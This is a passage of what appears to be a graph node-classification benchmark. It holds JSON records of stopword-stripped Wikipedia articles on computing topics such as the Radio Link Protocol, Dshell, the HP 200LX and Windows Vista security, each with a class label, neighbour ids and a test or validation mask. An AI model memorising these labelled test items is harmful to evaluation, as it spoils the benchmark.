    "node_id": 3273,
    "label": 5,
    "text": "Radio_Link_Protocol:radio link protocol radio link protocol rlp automatic repeat request arq fragmentation protocol used wireless typically cellular air interface wireless air interfaces tuned provide 1 packet loss vocoders mutually tuned sacrifice little voice quality 1 packet loss however 1 packet loss intolerable variants tcp something must done improve reliability voice networks carrying tcp/ip data rlp detects packet losses performs retransmissions bring packet loss .01 even .0001 suitable tcp/ip applications rlp also implements stream fragmentation reassembly sometimes in-order delivery newer forms rlp also provide framing compression older forms rlp rely upon higher-layer ppp protocols provide functions rlp transport ask air interface provide certain payload size instead air interface scheduler determines packet size based upon constantly changing channel conditions upcalls rlp chosen packet payload size right transmission fragmentation protocols 802.11b ip used payload sizes determined upper layers call upon mac create payload certain size protocols flexible rlp sometimes fail transmit deep fade wireless environment rlp payload size little 11 bytes based upon cdma is-95 network smallest voice packet size rlp headers must small minimize overhead typically achieved allowing ends negotiate variable 'sequence number space used number byte transmission stream variants rlp sequence counter small 6 bits rlp protocol ack-based nak-based rlps nak-based meaning forward-link sender assumes transmission got receiver naks out-of-order segment received greatly reduces reverse-link transmissions spectrally inefficient longer latency cellular networks transmit pipeline goes idle nak-based rlp must eventually retransmit last segment second time case last fragment lost reach .01 packet loss rate duplicate transmission typically controlled flush timer set expire 200-500 milliseconds channel goes idle concept rlp protocol invented phil karn 1990 cdma is-95 networks january 2006 ieee 802.20 specification uses one newest forms rlp cellular networks gsm cdma use different variations rlp umts lte protocol called rlc radio link control",
    "neighbors": [
      2752,
      10924,
      5071,
      8432,
      2329
    ],
    "mask": "None"
  },
  {
    "node_id": 3274,
    "label": 4,
    "text": "Dshell:dshell dshell open source python-based forensic analysis framework developed u.s. army research laboratory md tool provides users ability develop custom analysis modules helps understand events cyber intrusion framework handles stream reassembly ipv4 ipv6 network traffic also includes geolocation ip-to-asn mapping connection additionally framework plug-ins designed aid understanding network traffic present results user concise useful manner since dshell written entirely python code base customized particular problems modifying existing decoder extract different information existing protocols u.s. army research laboratory arl released version dshell github social coding website december 17 2014 100 downloads 2,000 unique visitors 18 countries publicly released dshell small select community users several government organizations users could use tool tool find exact information needed network data including looking names reassembled website requests decoded malware traffic arl chose release dshell github sharing world created security teams gaining another specialized tool keep networks secure furthermore increasing security internet whole increasing number skilled eyes looking bugs potential improvements throughout code 2014 nasa released 1,000 dshell agencies national security agency national guard air force research laboratory joined shortly following year github chosen dshell allows members easily download software code store edits provide mechanism offer feedback original designer additionally rolling enhancements official version make easier share software across organizations bypassing constant emailing sending cds june 2016 users created 11,000 copies tool offered approximately 62 suggested modifications original software additional modules within dshell framework accessed increase network security however ability rapidly develop share analytical modules core strength framework",
    "neighbors": [
      8554,
      7887,
      11221,
      5469,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 3275,
    "label": 5,
    "text": "Internet_Imaging_Protocol:internet imaging protocol internet imaging protocol iip internet protocol designed international imaging industry association iip built top http communicate images metadata took inspiration flashpix image architecture emerged tackle problem image sizes resolution growing faster internet bandwidth difficult quickly browse high quality images web browsers iip allows detail fetched user needs whole data file downloaded practically defines software fetches image tiles server includes scale image small overview image retrieved initially zooming panning carried fetching higher resolution image tiles server means size image viewed web without downloading iip also makes possible use variety viewer software whereas systems may force use one server file format one viewer iip currently version 1.05 actively developing",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 3276,
    "label": 0,
    "text": "METEO_System:meteo system meteo system machine translation system specifically designed translation weather forecasts issued daily environment canada system used 1981 30 september 2001 environment canada translate forecasts issued french province quebec english issued english canadian provinces french since competitor program replaced meteo system open governmental bid system developed john chandioux often mentioned one success stories field machine translation meteo system operational use environment canada 1982 2001 stems prototype developed 1975-76 taum group known taum-meteo initial motivation develop prototype junior translator came taum ask help translating weather bulletins environment canada since official communications emanating canadian government must available french english official languages act 1969 weather bulletins represent large amount translation real time junior translators spend several months producing first draft translations revised seniors difficult tedious job specificities english french sublanguages used rewarding lifetime bulletin 4 hours taum proposed build prototype mt system environment canada agreed fund project prototype ready months basic integration workflow translation source target bulletins travelled telex lines time mt happened mainframe computer first version system meteo 1 went operation control data cdc 7600 supercomputer march 1977 chandioux left taum group manage operation improve taum group embarked different project taum-aviation 1977–81 benoit thouin made improvements initial prototype subsequent year turned operational system three years meteo 1 demonstrated feasibility microcomputer-based machine translation satisfaction canadian government translation bureau public works government services canada meteo 1 formally adopted 1981 replacing junior translators workflow need high quality translation revision step done senior translators maintained quality measured percentage edit operations inserting deleting word counts 1 replacing 2 mt results reached 85 1985 time mt part still implemented sequence q-systems q-systems formalism rule-based sllp specialized language linguistic programming invented alain colmerauer 1967 postdoc coopérant taum group later invented prolog language 1972 returning france becoming university professor marseille-luminy engine q-systems highly non-deterministic manipulated data structures ways simple without types string number chandioux encountered limitations efforts raise translation quality lower computation time point could run microcomputers 1981 chandioux created new sllp metalanguage linguistic applications based basic algorithmic ideas q-systems deterministic offering typed labels tree nodes following advice bernard vauquois colmerauer created gram r developed microcomputers 1982 could start developing gram r new system translating weather bulletins high-end cromemco microcomputer meteo 2 went operation 1983 software ran 48kb central memory 5mb hard disk paging meteo 2 first mt application run microcomputer 1985 system nothing left initial prototype officially renamed meteo translated 20 million words per year english french 10 million words french english quality 97 typically took 4 minutes bulletin english sent winnipeg come back french mt human revision 1996 chandioux developed special version system meteo 96 used translate weather forecasts different kinds bulletins issued us national weather service 1996 summer olympics atlanta last known version system meteo 5 dates 1997 ran ibm pc network windows nt translated 10 pages per second able fit 1.44mb floppy disk",
    "neighbors": [
      5187,
      8421,
      8976,
      1269,
      4025,
      7164
    ],
    "mask": "Test"
  },
  {
    "node_id": 3277,
    "label": 9,
    "text": "Compiler_Description_Language:compiler description language compiler description language cdl programming language based affix grammars similar backus–naur form bnf notation designed development compilers limited capabilities control flow intentionally benefits limitations twofold one hand make possible sophisticated data control flow analysis used cdl2 optimizers resulting extremely efficient code benefit foster highly verbose naming convention turn leads programs great extent self-documenting language looks bit like prolog surprising since languages arose time work affix grammars opposed prolog however control flow cdl deterministically based success/failure i.e. alternatives tried current one succeeds idea also used parsing expression grammars cdl3 third version cdl language significantly different previous two versions original version designed cornelis h. a. koster university nijmegen emerged 1971 rather unusual concept core typical programming language source translated machine instructions canned sequences instructions represent core basic abstractions given language supports primitives additions numbers copying variables cdl1 lacks core responsibility programmer provide primitive operations form turned machine instructions means assembler compiler traditional language cdl1 language concept primitives concept data types apart machine word abstract unit storage necessarily real machine word evaluation rules rather similar backus–naur form syntax descriptions fact writing parser language described bnf rather simple cdl1 basically language consists rules rule either succeed fail rule consists alternatives sequences rule invocations rule succeeds alternatives succeeds tried sequence alternative succeeds rule invocations succeed language provides operators create evaluation loops without recursion although strictly necessary cdl2 optimizer achieves effect shortcuts increase efficiency otherwise recursive evaluation basic concept apart obvious application context-free grammar parsing cdl also well suited control applications since lot control applications essentially deeply nested if-then rules cdl1 rule evaluated act data unspecified type ideally data changed unless rule successful side effects failure causes problems although rule may succeed rule invoking might still fail case data change take effect fairly easy albeit memory intensive assure behavior data dynamically allocated stack rather hard static data often case cdl2 compiler able flag possible violations thanks requirement direction parameters input output input-output type rules fail test predicate fail function action side effect predicate action side effect test function must specified programmer rule evaluation based calling simpler simpler rules bottom primitive rules actual work cdl1 surprising primitives provide rules need addition program create rule two input parameters one output parameter output set sum two inputs code cdl compiler uses code strings conventions refer input output variables simply emits needed describe adding rule using assembly need assembler translate cdl compiler output machine code describe primitive rules macros cdl terminology pascal c need pascal c compiler run cdl compiler lack core primitives painful write snippet code even simplest machine instruction operation hand gives great flexibility implementing esoteric abstract primitives acting exotic abstract objects 'machine word cdl like 'unit data storage reference kind data stored additionally large projects made use carefully crafted libraries primitives replicated target architecture os allowing production highly efficient code get feel language small code fragment adapted cdl2 manual primitive operations defined terms java c complete program must define java array items elsewhere cdl2 appeared 1976 kept principles cdl1 made language suitable large projects introduced modules enforced data-change-only-on-success extended capabilities language somewhat optimizers cdl2 compiler especially cdl2 laboratory ide cdl2 world class time one feature cdl2 laboratory optimizer almost unique perform optimizations across compilation units i.e. treating entire program single compilation cdl3 recent language gave open-ended feature previous cdl versions provides primitives basic arithmetic storage access extremely puritan syntax earlier cdl versions number keywords symbols run single digits also relaxed basic concepts expressed syntax rather explicit semantics addition data types introduced language commercial mbp cobol cobol compiler pc well mprolog system industrial strength prolog implementation ran numerous architectures ibm mainframe vax pdp-11 intel 8086 etc os-s dos/os/cms/bs2000 vms/unix dos/windows/os2 latter particular testimony cdl2 portability programs written cdl compilers least one commercial gui application developed maintained cdl application dental image acquisition application owned dexis dental office management system also developed cdl software mephisto iii chess computer written cdl2",
    "neighbors": [
      1952,
      10560,
      7876,
      8421,
      8262,
      1672,
      1611
    ],
    "mask": "None"
  },
  {
    "node_id": 3278,
    "label": 9,
    "text": "J2EE_Management:j2ee management j2ee management specification java specification request jsr-77 standardization j2ee server management j2ee management specification abstracts manageable parts j2ee architecture defines interface accessing management information helps system administrators integrate j2ee servers system management environment also helps application developers create management tools scratch goal jsr 77 abstract fundamental manageable aspects j2ee architecture provide well defined model implementing instrumentation information access addition specification defines standardized api inter-operating j2ee components participate monitoring control platform ’ resources implementation jsr-77 enterprise applications done application server done web container j2ee management model specification attributes operations architecture managed objects required compliant j2ee platform implementations model designed interoperable variety industry standard management systems protocols management ejb mejb component provides interoperable remote access model j2ee application components compliant implementations must support mejb component specification also provides standard mappings model cim/wbem common information model cim snmp management information base mib implementation support snmp cim/wbem optional latest version jsr 1.1 released 08 may 2006",
    "neighbors": [
      9988,
      3341,
      10526,
      10020,
      6067,
      2106,
      3517,
      6334,
      3518,
      3008,
      11582,
      1095,
      3920,
      11344,
      4959,
      4960,
      3558,
      1128,
      3560,
      9834,
      3954
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3279,
    "label": 4,
    "text": "World_Reuse,_Repair_and_Recycling_Association:world reuse repair recycling association world reuse repair recycling association wr3a business consortium dedicated reform trade e-waste wr3a inspired fair trade organizations wr3a fair trade association tradename fair trade recycling reserved 2013 established improve export markets surplus electronics e-waste defend biased reporting racial profiling wr3a conceived 2006 following visit china group including usa electronics recycler american retroworks inc. university california davis recycling program director seattle recycler zero-export policy group inspired visit three china semi knock factories factories purchased usa computer monitors still functional crts crts knocked bare tube inserted new tv monitor case complete new tuner board etc wr3a founders observed western journalists reporting purchase import used crts invariably described primitive wire burning operations rather re-manufacturers often contract manufacturers originally assembled brand new crt monitors rebuilt second-hand crts usa crt refurbishing factory video display corp tucker georgia wr3a proposed form coalition usa companies export functional crt monitors directly reuse factories removing imploded damaged screen-burned older non-compliant raster e.g trinitron crts loads destined crt factories usa companies remove recycle bad 1/3 crts would benefit higher prices chinese factories would bypass sorting villages guiyu wr3a swamped orders asian factories year chinese government took new crt manufacturing capacity worldwide 1990s eventually opposed import used crts many skd factory owners relocated businesses countries indonesia malaysia thailand others relocated used monitor sourcing operations hong kong vietnam trucking crts overland chinese factories period several anti-globalist ngos began campaign end trade used electronics especially crts cbs 60 minutes economist businessweek others ran reports claiming 80 displays exported reused burned copper primitive scrapyards source 80 dumping claim later retracted eventually reuse operations asia turned re-export africa used local sources urban asian cities used crts used remanufacturing new tv monitor displays decline purchases used displays usa 2011 wr3a recognized organizational conflicts cooperative suppliers competing declining market organization refined mission 2013 emphasize anti-defamation overseas refurbishing companies promoted used electronics exports peer-reviewed fair trade agreements importers used equipment africa asia latin america consider organization defender tech sector refurbishers wr3a remains dedicated principle used computer exports outlawed outlaws export used computers organization members south america africa asia north america europe dedicated defending legitimate used electronics exporters organization considers false defamatory declarations e-waste toxics externalization 2015 2017 2018 wr3a led visits agbogbloshie district central accra bringing journalists al jazeera independent smithsonian others meet dagbani speaking translators visit led journalists discredit allegations agbogbloshie largest e-waste dump world former wetland outskirts city received hundreds sea containers full junk electronics wr3a found credible evidence dumping site exaggerated accra metropolitan association representatives interested relocating economic refugees develop property three months forced evictions used electronics processed site shown delivered carters wheelbarrows consist devices vcrs imported decades previously wr3a provided reporters world bank statistics showing domestic ghana generation accounted e-waste observed ghana recorded organization interviews ghana tech sector representatives uploaded youtube wr3a september 2013 wr3a adapted tradename fair trade recycling trademark registered uspto registered supplemental certification may 26 2015 organization claim recognized fairtrade one word april 2013 wr3a held fair trade recycling summit middlebury college vermont summit brought together researchers memorial university canada pontificia universidad catholica de peru university southern california usa massachusetts institute technology mit representatives usa international trade office basel convention secretariat interpol several used electronics importers africa asia latin america group deliberated beneficial development emerging markets electronics reuse repair labelled tinkerer blessing yuzo takahashi 2000 technology history network tinkerers. role electronics repair reverse engineering development contrasted so-called resource curse economic development natural resource exploitation middlebury students presenters discussed whether balanced approach recycling secondary materials may warranted follow meeting wr3a interpol held july 2013 november 2013 interpol announced new research program study used electronics trade continuing arrests african importers project eden debate fair trade recycling advocates anti-export organization basel action network profiled usa today september 26 2013 discovery magazine nih 2006 july 2012 memorial university newfoundland canada announced 5-year research project study map routes used electronics weee e-waste exports wr3a partner research grant along researchers universities peru california first year group document efforts develop fair trade recycling model mexico see npr pbs ap coverage research possible application model peru bangladesh china wr3a formerly adapted registered tradename fair trade recycling 2012 wr3a collaborated massachusetts institute technology publication mit january 2012 study e-waste generation exports wr3a provided researchers detailed reconciliations 3 years exports wr3a members mit compared wr3a data corroborating data isri usepa basel secretariat ghana nigeria studies may 2011 wr3a interviewed part e-waste german news magazine zdf.kultur investigated assumptions african imports primitive linked exports egypt green revolution march 2011 wr3a profiled motherboard.tv organization case reduced exports used electronics stewards unintended consequences october 2010 wr3a announced partnership basel action network reduce unnecessary breakage destruction working computer monitors california california sb20 laws followed report critical california cancellation policies published sacramento bee july 19 2010 july 30 2010 discovery news presented analysis contrasting wr3a fair trade engagement approach basel action network ban trade restriction approach abstained choosing sides. may 15 2009 national public radio npr program living earth profiled one wr3a members women cooperative tv repair recycling mexico january 2009 organization presented statistics film keynote address ces 2009 las vegas statistics demonstrated rate growth internet access much higher countries low incomes logically unlikely growth achieved new computers wr3a also presented film reuse refurbishing operations demonstrate proper recycling practices best available practices ten countries wr3a contracted consultant us environmental protection agency july 2008 publication electronic waste management united states",
    "neighbors": [
      3009,
      7579
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3280,
    "label": 2,
    "text": ".DS_Store:.ds store apple macos operating system .ds_store file stores custom attributes containing folder position icons choice background image name abbreviation desktop services store reflecting purpose created maintained finder application every folder functions similar file desktop.ini microsoft windows starting full stop period character hidden finder many unix utilities internal structure proprietary file .ds_store created directory folder accessed finder application even remote file systems mounted servers share files example via server message block smb protocol apple filing protocol afp remote file systems however could excluded operating system settings permissions although primarily used finder files envisioned general-purpose store metadata display options folders icon positions view settings example mac os x 10.4 tiger later .ds_store files contain spotlight comments folder files comments also stored extended file attributes finder read earlier apple operating systems finder applications created similar files root volume accessed including foreign file systems collecting settings files volume instead separate files respective folder complaints many users prompted apple publish means disable creation files remotely mounted network file systems however instructions apply local drives including usb flash drives although workarounds mac os x 10.5 .ds_store files visible remote filesystems .ds_store files impose additional burdens revision control process inasmuch frequently changed therefore appear commits unless specifically excluded .ds_store files included archives zip created os x users along hidden files directories .ds_store files known adversely affect copy operations multiple files selected file transfer copy operation retroactively cancel progress upon reaching .ds_store file forcing user restart copy operation beginning 2015 .ds_store file led leakage tcl corporation admin portal",
    "neighbors": [
      3330,
      9762,
      6797,
      7663,
      2095,
      3921,
      8404
    ],
    "mask": "Test"
  },
  {
    "node_id": 3281,
    "label": 3,
    "text": "HP_200LX:hp 200lx hp 200lx palmtop pc f1060a f1061a f1216a also known project felix personal digital assistant introduced hewlett-packard august 1994 often called palmtop pc notable minor exceptions ms-dos-compatible computer palmtop format complete monochrome graphic display qwerty keyboard serial port pcmcia expansion slot input accomplished via small qwerty-keyboard numeric keypad enclosed clamshell-style case less 25 size standard notebook computer palmtop runs 30–40 hours two size aa alkaline ni-cd rechargeable cells charge batteries ni-cd nimh via 12v dc wall adapter hp 200lx intel 80186 compatible embedded central processing unit named hornet runs ~7.91 megahertz upgraded overclocked 15.8 mhz 1 2 4 mb memory 640 kb ram rest used expanded memory ems memory-based storage space after-market updates bring memory chips 64 mb frees pcmcia slot modem ethernet card use silicom accton 2212/2216 netgear fa411 sohoware nd5120 network cards compatible ibm pc/xt compatible running ms-dos 5.0 rom hp 200lx run virtually program would run full-size pc compatible computer long code written intel 8086 8088 80186 cpu run using cga graphics also run programs written 80286 cpu provided require use protected mode 16-bit pcmcia type ii expansion slot supports 5 v 150 maximum sir compatible infrared port full serial port proprietary mini connector space constraint reasons built-in software suite runs rom includes lotus 1-2-3 release 2.4 spreadsheet calendar phone book terminal capable scientific/business calculator among applications large compactflash storage card serial mouse even microsoft windows 3.0 run palmtop running windows limited hardware maximum version could run windows 3.0 real mode however word 1.x excel 2.x windows would run since could run real mode allowing authoring ms office format-compatible files 640×200 resolution cga compatible 4-shade gray-scale lcd screen back light electroluminescent technology back light installation available third party since 2004 keen eyesight still required use small palmtop effectively without resorting using 2× 4× zoom modes true cga displays allow redefinable fonts text mode support hardware code page 437 hp 95lx supports code page 850 instead starting hp 100lx lx series even supports user-switchable text mode rom fonts code page 437 850 well software-definable ram fonts codepages 437g 437t 852 866 via keybez lotus 1-2-3 internally uses lotus international character set lics characters translated code page 850 display printing purposes hp 100lx palmtop pc f1020a 1 mb f1022a 2 mb model also known project cougar direct predecessor 200lx released 1993 available international english u.s. english french german spanish variants localized keyboard messages almost including hornet cpu ms-dos 5.0 earlier built-in application versions hp palmtop fx variant hp 100lx 2 mb flashable memory 1993 fat flash disk images could created written drive f special flashdsk.exe utility according one source developed korean insurance company hp 200lx aia 2 mb double-speed variant hp 200lx manufactured insurance company american international assurance aia hp 1000cx palmtop pc f1203a 1 mb march 1995 f1222a 2 mb model february 1997 also known project puma economy version 200lx hornet cpu without built-in software except ms-dos 5.0 operating system rom widespread use among example coca-cola warehouse managers loaded logistics software onto machine black clamshell 200lx dark green casing hp omnigo 700lx communicator plus f1206a codenamed columbia project hp calculator branch singapore hp omnigo 700lx essentially 2 mb hp 200lx including hornet cpu redesigned piggyback nokia 2110 gsm mobile telephone wireless mobility hp 200lx motherboard factory-modified support second pcmcia slot nokia data card owing relatively large size nokia telephone hp omnigo 700lx large pebble-shaped casing making handheld phone attached announced late 1995 part plans collaboration hp nokia shipment starting march 1996 production hp omnigo 700lx ceased nokia 2110 mobile telephone rendered obsolete later telephones device seen forerunner first smartphone nokia communicator 9000 hp 95lx palmtop pc f1000a 512 kb f1010a 1 mb model introduced basic design april 1991 known internally project jaguar nec v20 cpu enhanced intel 8088 clone intel 80186 instruction set compatibility additional intel 8080 emulation mode running 5.37 mhz hampered running pc applications quarter-cga resolution lcd screen mda compatible instead cga graphics chip hp 95lx part displayed graphics special lx graphics mode ran ms-dos 3.22 lotus 1-2-3 release 2.2 built also included cr2032 battery memory backup aa mains ran hp omnigo 100 organizer plus f1305a/f1310a designed sophisticated successor lx series incorporated hp-12c calculator functionality gui based controlled pen input keyboard however lacked versatility running unmodified dos programs normal operation mode dos-based pen/geos 2.1 graffiti handwriting recognition running datalight rom-dos 6.22 widely accepted calculator replacement palm pocket pcs became acceptable pdas equipped 1 mb ram based vadem vg230/v5h highly integrated system controller 16 mhz nec v30hl cpu instruction set compatible intel 80186 although product line discontinued hp order introduce windows ce product line starting hp 300lx strong interest hardware continued last palmtop hp ran ms-dos operating system much software desktop pcs came useful bundle software including 1-2-3 quicken compared machines windows-based operating systems ce dos programs compact efficient programs software carousel many applications programs could loaded third-party upgrades repairs renovations available maintain extend device small size hp 200lx popular japan much demise prompted open-source initiative design market amd elan sc400-based replacement fill place 'morphy one club organization created blueprints device prototype ever built reasons remain unclear argue scam scheme hundreds people lost deposits placed new palmtop advance project leaders argued key electronic components unavailable due strong demand mobile telephone manufacturing industry many easter eggs built hp 200lx known ones listed follows easter egg hp 200lx built game lair squid startup screen game user types word gallery gallerie french palmtop siegergalerie german palmtop galeria spanish palmtop he/she placed part maze contains photographs primary software developers worked hp 200lx user may exit gallery exiting door end corridor software developers photographs listed starting left right left right follows last panel right corridor contains thank message photographs developers described a-maze-ing easter egg hp 200lx self test mode palmtop powered user may press esc start self test mode cursor display option pressing enter 14 times step various screens user comes screen example text form limerick poem poem follows easter egg hp 200lx self test mode palmtop powered user may press esc start self test mode cursor display option pressing ctrl enter holding alt pressing enter 13 times user comes cryptic poem relating business issues faced software development team poem follows easter egg hp 200lx self test mode palmtop powered user may press esc start self test mode cursor display option pressing ctrl enter holding shift pressing enter 13 times user comes allegorical poem history future hp lx palmtops poem follows note project names hp 95lx hp 100lx hp 200lx 'jaguar 'cougar 'felix respectively 'felix first lx include quicken easter egg built system manager hp 200lx 'easter egg probably development tool easter egg case user may display function first pressing blue ... key start 'more applications user may hold alt pressing f9 4 times followed f10 long alt key held user observe columns data system manager compliant .exm programs registered system manager along arcane program information hp 200lx includes undocumented calculator application named hexcalc written andrew gryc provides arithmetical logical operations binary octal decimal hexadecimal system utility added applications menu entry following fields",
    "neighbors": [
      2179,
      5384,
      3214,
      10768,
      9363,
      1304,
      8229,
      7983,
      5681,
      1083,
      321,
      6090,
      7243,
      9166,
      2258,
      11100,
      1121,
      1638,
      1515,
      6765,
      4334,
      1776,
      5756
    ],
    "mask": "None"
  },
  {
    "node_id": 3282,
    "label": 4,
    "text": "Distributed.net:distributed.net distributed.net distributed computing effort attempting solve large scale problems using otherwise idle cpu gpu time governed distributed computing technologies incorporated dcti non-profit organization u.s. tax code 501 c 3 distributed.net working rc5-72 breaking rc5 72-bit key ogr-28 searching optimal 28-mark golomb ruler rc5-72 project pace exhaust keyspace 150 years although project end whenever required key found problems part series ogr part infinite series rc5 eight unsolved challenges rsa security although may 2007 rsa security announced would longer providing prize money correct key secret key challenges distributed.net decided sponsor original prize offer finding key result 2001 distributed.net estimated throughput 30 tflops 2009 throughput estimated much higher coordinated effort started february 1997 earle ady christopher g. stach ii hotjobs.com new media labs effort break rc5-56 portion rsa secret-key challenge 56-bit encryption algorithm 10,000 usd prize available anyone could find key unfortunately initial effort suspended result syn flood attacks participants upon server new independent effort named distributed.net coordinated jeffrey a. lawson adam l. beberg david c. mcnett along several others would serve board operate infrastructure late march 1997 new proxies released resume rc5-56 work began enhanced clients cow head selected icon application project mascot rc5-56 challenge solved october 19 1997 250 days correct key 0x532b744cc20999 plaintext message read unknown message time move longer key length rc5-64 challenge solved july 14 2002 1,757 days correct key 0x63de7dc154f4d039 plaintext message read unknown message things better left unread search ogrs order 24 25 26 27 completed distributed.net 13 october 2004 25 october 2008 24 february 2009 19 february 2014 respectively dnetc file name software application users run participate active distributed.net project command line program interface configure available wide variety platforms distributed.net refers software application simply client volunteers running 32-bit windows ati/amd stream enabled gpus contributed processing power rc5-72 project volunteers running 64-bit gnu/linux contributed processing power ogr-28 project portions source code client publicly available although users permitted distribute modified versions distributed.net rc5-72 ogr-28 projects available boinc client moo wrapper yoyo home projects respectively recent years work rc5-72 project submitted clients run gpu modern graphics cards although project already underway almost 6 years first gpus began submitting results march 2018 gpus represent 78 completed work units complete nearly 93 work units day",
    "neighbors": [
      833,
      10658,
      5956,
      2053,
      6916,
      7556,
      2154,
      3629,
      1806,
      1776,
      915,
      1941,
      6421,
      7318,
      2299,
      8029
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3283,
    "label": 2,
    "text": "Comparison_of_Windows_Vista_and_Windows_XP:comparison windows vista windows xp page comparison windows vista windows xp windows xp windows vista differ considerably regards security architecture networking technologies management administration shell user interface mobile computing windows xp suffered criticism security problems issues performance vista received criticism issues performance product activation another common criticism vista concerns integration new forms drm operating system user account control uac security technology windows vista faces backward compatibility problems many games utility programs work windows xp july 2008 2,000 applications specifically carried 'vista compatibility logo although majority applications without logo run without problems number low compared number programs currently work xp either natively simulation modality initial performance tests demonstrated windows xp outperforms vista several productivity areas file copy operations speculated one area vista performs better xp test run crn test center 1.25 gb file copied network share desktop xp took 2 minutes 54 seconds vista sp1 took 2 minutes 29 seconds vista implementation file copy arguably complete correct file register transferred completely transferred windows xp file completed dialogue box displayed prior file actually finishing copy transfer file completing dialogue displayed cause issue storage device ejected prior file successfully transferred copied windows xp due dialogue box premature prompt another test performed tom hardware january 2007 applications unreal tournament 2004 graphics benchmarking suite specviewperf 9.03 suffered heavily lack support opengl graphics library vista reached conclusion windows vista clearly great new performer comes executing single applications maximum speed hand find evidence windows vista desktop window manager dwm consumes energy windows xp window manager tests performed computer 2.93 ghz intel core 2 extreme x6800 processor 2× 1024 mb ddr2-800 ram radeon x1900xtx iceq3 graphics card 150 gb western digital wd1500adfd hard drive gigabyte ga-965p-dq6 motherboard scientific paper performance evaluation recent windows operating system performance concludes windows vista n't provide better overall performance high-end computer system compared windows xp performance improvements seen memory management graphics display parts os equal lower performance windows xp low-end computer system windows xp outperforms windows vista tested areas windows os network performance depends packet size used protocol however general windows vista compared windows xp shows better network performance particularly medium-sized packets security top priority windows vista development windows xp every user set administrator default unless added computer management result home users ran software administrator access however left users unwittingly open potential security threats hacking malware downloads large amount existing software ’ run well standard user due developers implementing principle least privilege design testing example many poorly written applications often assume incorrectly read write access entire filesystem system registry denying application access assumed rights cause application fail sometimes person logged standard user windows xp ca n't perform user-specific tasks changing system clock calendar changing computer time zone changing computer power management settings due so-called lua bugs user account control windows vista improves limiting application software standard user privileges administrator authorizes increase privilege level way uac prevents users making inadvertent changes system settings locks computer prevent unauthorized applications installing performing malicious actions windows vista able work around many lua bugs third party applications file registry virtualisation feature well application compatibility shims internet explorer 7 protected mode utilizes user account control isolate ie applications prevent writing content location except temporary internet files folder internet explorer 7 available xp support protected mode xp windows vista also includes windows defender spyware scanning removal tool also available windows xp free enterprise ultimate editions windows vista include bitlocker drive encryption aims help protect data case stolen devices vista implements address space layout randomization makes considerably difficult malicious code exploit return-to-libc attacks previous versions windows particularly 64-bit systems furthermore vista implements heap management enhancements make much difficult carry buffer overflow attacks 64-bit editions windows vista require kernel-mode drivers digitally signed initially making difficult rootkits install alureon managed overcome obstacle 2010 subverting master boot record firewall vista rewritten allowing outbound well inbound traffic blocked luna default visual style windows xp available three color schemes blue default olive green silver windows xp media center edition comes royale default theme editions windows vista default theme windows aero aero offers translucent window effects well live thumbnails animated transitions flip 3d however requires compatible graphics card wddm driver directx 9 support 32-bit color otherwise windows vista displayed using windows vista basic visual style",
    "neighbors": [
      6028,
      8080,
      3857,
      11283,
      537,
      9505,
      11301,
      1577,
      6697,
      1581,
      2221,
      11184,
      1077,
      5176,
      1337,
      700,
      6972,
      6462,
      9791,
      1474,
      8391,
      1098,
      2383,
      10835,
      11605,
      7515,
      1501,
      11103,
      6114,
      617,
      5225,
      2027,
      7151,
      8315,
      9854,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 3284,
    "label": 5,
    "text": "Coccinella_(software):coccinella software coccinella latin coccinella ladybird free open-source cross-platform client xmpp/jabber-instant messaging-protocol software written tcl/tk language runs bsd linux mac os x solaris windows platforms support tcl/tk mats bengtsson published 1999 name whiteboard renamed coccinella 2003",
    "neighbors": [
      10242,
      5251,
      5382,
      4746,
      1036,
      6797,
      11408,
      3228,
      10271,
      3105,
      9511,
      1960,
      1962,
      7983,
      9519,
      692,
      8758,
      823,
      1467,
      9151,
      6208,
      1218,
      2760,
      2892,
      4318,
      3812,
      4068,
      6628,
      5612,
      5492,
      7928,
      10748
    ],
    "mask": "None"
  },
  {
    "node_id": 3285,
    "label": 9,
    "text": "JavaFX_Script:javafx script javafx script scripting language designed sun microsystems forming part javafx family technologies java platform javafx targeted rich internet application domain competing adobe flex microsoft silverlight specializing rapid development visually rich applications desktop mobile markets javafx script works integrated development environments netbeans eclipse intellij idea javafx released gnu general public license via sun sponsored openjfx project javafx script used called f3 form follows function f3 primarily developed chris oliver became sun employee acquisition seebeyond technology corporation september 2005 name changed javafx script became open sourced javaone 2007 javafx 1.0 released december 4 2008 september 10 2010 oracle announced javaone javafx script would discontinued although javafx api would made available languages java virtual machine september 27 2010 stephen chin announced visage declarative user-interface language based javafx script enhancements recently original f3 programming language process resurrected enhanced javafx script compiled statically typed declarative scripting language java platform provided automatic data-binding mutation triggers declarative animation using expression language syntax code blocks potentially yield values standard javafx apis supported retained mode vector graphics video playback standard swing components although f3 began life interpreted language prior first preview release q3 2008 javafx script shifted focus predominantly compiled interpreted javafx script still possible via jsr 223 'scripting java bridge built top java platform easy use java classes javafx script code compiled javafx script able run platform recent java runtime installed javafx script declarative syntax constructing user interfaces contrasts sharply verbose series method calls required construct equivalent interface swing directly simple hello world program javafx script shows following window/frame program also written way",
    "neighbors": [
      3328,
      9731,
      1801,
      4235,
      1809,
      2710,
      1316,
      10789,
      11559,
      1707,
      5677,
      3247,
      7983,
      6322,
      9780,
      7104,
      9665,
      6338,
      10436,
      1480,
      2895,
      597,
      10200,
      220,
      4960,
      9955,
      11363,
      11626,
      5612,
      7148,
      7022,
      3442,
      8179,
      9333,
      1399,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 3286,
    "label": 2,
